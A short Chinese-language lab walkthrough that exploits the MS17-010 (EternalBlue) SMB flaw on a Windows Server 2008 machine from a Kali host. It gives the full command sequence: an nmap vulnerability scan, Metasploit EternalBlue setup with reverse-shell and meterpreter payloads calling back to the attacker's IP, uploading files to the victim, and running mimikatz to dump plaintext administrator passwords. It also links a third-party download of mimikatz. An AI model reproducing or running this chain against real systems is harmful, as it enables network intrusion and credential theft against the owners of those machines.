MS17-010 漏洞利用

环境

• 被攻击目标IP: 192.168.118.137 系统类型：windows server 2008
• 攻击IP(黑客主机): 192.168.118.130 系统类型： KALI

使用nmap 探测smb漏洞

nmap -p139,445 -Pn -n  --script  smb-vuln-*     192.168.118.137

#扫描结果显示存在 MS17-010漏洞

# -Pn ：跳过主机存活监测
# -n: 关闭域名查询
# smb-vuln-*: *指代以smb-vuln-所有的漏洞脚本

使用Metasploit攻击

• 启动MSF: msfconsole

• 搜索攻击模块：search ms17-010

• 加载模块：

use exploit/windows/smb/ms17_010_eternalblue 

使用show options 或者options查看选项设置
可以使用show targets来查看可以攻击的系统版本
使用show payloads可以加载所有可以使用的攻击向量

设置攻击目标

set RHOST 192.168.118.137

设置并加载payload：

 set payload generic/shell_reverse_tcp 

并设置反弹shell连接的地址和端口，默认端口是4444

set LHOST 192.168.118.130

使用命令expolit或者run进行攻击：攻击成功后会反弹shell

PAYLOAD2 持久会话

#接着上面的继续使用下面的payload,可以进行文件上传
set payload windows/x64/meterpreter/reverse_tcp

然后使用 run

Meterpreter session 2 opened (192.168.118.130:4444 -> 192.168.118.137:49159) at 2018-09-13 15:42:36 +0800
这句话告诉我们反弹了一个会话本机的4444到目标主机的49159
使用命令进入会话: sessions 2
使用upload 上传文件，将本机的/root/x64/的文件上传到目标主机

mimikatz 获取hash 以及明文密码

下载地址：https://pan.baidu.com/s/1RX9FGQRUtZJQQ_6Lyq1m-Q 密码：coxc

下面我们利用mimikatz获取目标主机的管理员密码：
输入shell进入目标主机的CMD

mimikatz使用帮助:

输入xxx::能够看看mimikatz的命令帮助
输入privilege::回车能看到privilege的命令帮助

输入privilege::debug进行提权操作
输入sekurlsa::logonPasswords获取windows用户密码

END